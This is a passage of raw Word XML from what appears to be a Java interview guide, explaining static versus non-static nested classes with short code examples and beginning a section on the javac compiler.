    <w:p w14:paraId="3B0F66A3" w14:textId="77777777" w:rsidR="007415DC" w:rsidRPr="00CE4B95" w:rsidRDefault="007415DC" w:rsidP="007415D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static inner class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be instantiated without needing the outer class’s instance, because it is not tied to an instance of the enclosing class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E140D2" w14:textId="77777777" w:rsidR="007415DC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="007415D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3E95CC6">
          <v:rect id="_x0000_i1155" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5480AEAD" w14:textId="4BD0C5CD" w:rsidR="007415DC" w:rsidRPr="00CE4B95" w:rsidRDefault="007415DC" w:rsidP="007415D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an We Create Objects of a Static Nested Class?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B9FC63" w14:textId="77777777" w:rsidR="007415DC" w:rsidRPr="00CE4B95" w:rsidRDefault="007415DC" w:rsidP="007415D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es, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>you can create objects of a static class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (nested static class) in Java. Since a static nested class is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>independent of the outer class instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, it can be instantiated directly using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>class name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65143E20" w14:textId="77777777" w:rsidR="007415DC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="007415D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A99173B">
          <v:rect id="_x0000_i1156" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A03B7F" w14:textId="77777777" w:rsidR="007415DC" w:rsidRPr="00CE4B95" w:rsidRDefault="007415DC" w:rsidP="007415D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Static Nested Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1520BFB4" w14:textId="77777777"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Outer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46711E4" w14:textId="77777777"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aticNested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12625D5" w14:textId="77777777"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displ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F86133A" w14:textId="77777777"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Inside static nested class"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659C7069" w14:textId="77777777"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D914BE7" w14:textId="77777777"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A19BC01" w14:textId="77777777"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184E3919" w14:textId="77777777"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BF1398B" w14:textId="77777777"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e an object of the static nested class without an instance of OuterClass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40394B95" w14:textId="77777777"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OuterClass</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aticNestedClass</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> nestedObj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OuterClass</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aticNestedClass</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711574E8" w14:textId="77777777"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        nested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ispl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s: Inside static nested class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F32EA0E" w14:textId="77777777"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6BB51F1" w14:textId="541DB151"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0CEC7E" w14:textId="77777777" w:rsidR="007415DC" w:rsidRPr="00CE4B95" w:rsidRDefault="007415DC" w:rsidP="007415D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 this example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D96555" w14:textId="77777777" w:rsidR="007415DC" w:rsidRPr="00CE4B95" w:rsidRDefault="007415DC" w:rsidP="007415D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aticNestedClass is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>static nested class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> inside OuterClass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F113343" w14:textId="77777777" w:rsidR="007415DC" w:rsidRPr="00CE4B95" w:rsidRDefault="007415DC" w:rsidP="007415D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can create an instance of StaticNestedClass </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>without</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> creating an instance of OuterClass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E872D2" w14:textId="77777777" w:rsidR="007415DC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="007415D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E1D23A7">
          <v:rect id="_x0000_i1157" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D89C831" w14:textId="77777777" w:rsidR="007415DC" w:rsidRPr="00CE4B95" w:rsidRDefault="007415DC" w:rsidP="007415D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atic vs. Non-Static Inner Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D1DAD7" w14:textId="77777777" w:rsidR="007415DC" w:rsidRPr="00CE4B95" w:rsidRDefault="007415DC" w:rsidP="007415D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Nested Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C5382F" w14:textId="77777777" w:rsidR="007415DC" w:rsidRPr="00CE4B95" w:rsidRDefault="007415DC" w:rsidP="007415D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be instantiated without an instance of the outer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030920E5" w14:textId="77777777" w:rsidR="007415DC" w:rsidRPr="00CE4B95" w:rsidRDefault="007415DC" w:rsidP="007415D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an access only </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>static members</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the outer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103F9F0D" w14:textId="77777777" w:rsidR="007415DC" w:rsidRPr="00CE4B95" w:rsidRDefault="007415DC" w:rsidP="007415D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n-Static Inner Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C56F7E" w14:textId="77777777" w:rsidR="007415DC" w:rsidRPr="00CE4B95" w:rsidRDefault="007415DC" w:rsidP="007415D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quires an instance of the outer class to create an object of the inner class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78532756" w14:textId="77777777" w:rsidR="007415DC" w:rsidRPr="00CE4B95" w:rsidRDefault="007415DC" w:rsidP="007415D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an access both </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>instance and static members</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the outer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2919041B" w14:textId="77777777" w:rsidR="007415DC" w:rsidRPr="00CE4B95" w:rsidRDefault="007415DC" w:rsidP="007415D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Non-Static Inner Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB33C12" w14:textId="77777777"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Outer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614305D" w14:textId="77777777"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ner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F9057F7" w14:textId="77777777"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displ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F8BAC6B" w14:textId="77777777"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Inside non-static inner class"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C62714C" w14:textId="77777777"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7A11DB8" w14:textId="77777777"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFDDCA8" w14:textId="77777777"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3806F771" w14:textId="77777777"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E4F7ECB" w14:textId="77777777"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You need an instance of OuterClass to create an instance of the inner class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC01C4B" w14:textId="77777777"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OuterClass</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> out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OuterClass</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470A4E79" w14:textId="77777777"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OuterClass</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InnerClass</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> innerObj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outer</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nerClass</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71716101" w14:textId="77777777"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        inner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ispl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s: Inside non-static inner class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A35688" w14:textId="77777777"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DF5AD9E" w14:textId="262D0C51" w:rsidR="00484B3F" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4CD772" w14:textId="77777777" w:rsidR="007415DC" w:rsidRPr="00CE4B95" w:rsidRDefault="007415DC" w:rsidP="007415D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 this example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F228D2" w14:textId="77777777" w:rsidR="007415DC" w:rsidRPr="00CE4B95" w:rsidRDefault="007415DC" w:rsidP="007415D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nerClass is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-static inner class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3914FC99" w14:textId="77777777" w:rsidR="007415DC" w:rsidRPr="00CE4B95" w:rsidRDefault="007415DC" w:rsidP="007415D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o create an instance of InnerClass, you need to first create an instance of the outer class OuterClass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752B3A2B" w14:textId="77777777" w:rsidR="007415DC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="007415D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ED82C0">
          <v:rect id="_x0000_i1158" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1663737E" w14:textId="77777777" w:rsidR="007415DC" w:rsidRPr="00CE4B95" w:rsidRDefault="007415DC" w:rsidP="007415D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00526399" w14:textId="77777777" w:rsidR="007415DC" w:rsidRPr="00CE4B95" w:rsidRDefault="007415DC" w:rsidP="007415D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Yes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, you can create objects of a static nested class without creating an instance of the outer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C3883F" w14:textId="77777777" w:rsidR="007415DC" w:rsidRPr="00CE4B95" w:rsidRDefault="007415DC" w:rsidP="007415D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static nested class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is independent of the outer class’s instance, whereas a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-static inner class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> requires an instance of the outer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E20A338" w14:textId="698BD7F4" w:rsidR="007415DC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="007415D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F35AF1E">
          <v:rect id="_x0000_i1159" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FBF46B" w14:textId="7360A305" w:rsidR="00BE2BC1" w:rsidRPr="00CE4B95" w:rsidRDefault="00D44E5C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc196307515"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Which compiler is used by Java</w:t>
      </w:r>
      <w:r w:rsidR="00BE2BC1" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="5FB2B97E" w14:textId="392FB2B0" w:rsidR="009361FD" w:rsidRPr="00CE4B95" w:rsidRDefault="009361FD" w:rsidP="00FE0A69">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Java uses the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java Compiler</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> called </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>javac</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to compile Java source code. Here's how the process works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66830DD5" w14:textId="77777777" w:rsidR="009361FD" w:rsidRPr="00CE4B95" w:rsidRDefault="009361FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ource Code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You write your Java code in .java files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB69645" w14:textId="77777777" w:rsidR="009361FD" w:rsidRPr="00CE4B95" w:rsidRDefault="009361FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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iling with javac</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AFB281" w14:textId="77777777" w:rsidR="009361FD" w:rsidRPr="00CE4B95" w:rsidRDefault="009361FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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javac compiler takes the .java file and compiles it into bytecode, which is platform-independent and stored in a .class file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565FC5BF" w14:textId="77777777" w:rsidR="009361FD" w:rsidRPr="00CE4B95" w:rsidRDefault="009361FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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bytecode is generated as an intermediate representation of the code, which can then be executed by the Java Virtual Machine (JVM) on any platform.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333203C8" w14:textId="77777777" w:rsidR="009361FD" w:rsidRPr="00CE4B95" w:rsidRDefault="009361FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ecution with java</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C7EFDE" w14:textId="77777777" w:rsidR="009361FD" w:rsidRPr="00CE4B95" w:rsidRDefault="009361FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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fter compilation, the bytecode is executed by the JVM using the java command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3149D3D1" w14:textId="77777777" w:rsidR="009361FD" w:rsidRPr="00CE4B95" w:rsidRDefault="009361FD" w:rsidP="009361F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rocess:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784FCD4B" w14:textId="77777777" w:rsidR="009361FD" w:rsidRPr="00CE4B95" w:rsidRDefault="009361FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ep 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Write Java code (e.g., HelloWorld.java).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2883A451" w14:textId="77777777" w:rsidR="009361FD" w:rsidRPr="00CE4B95" w:rsidRDefault="009361FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ep 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Compile the Java code using the javac command:</w:t>
      </w:r>
    </w:p>
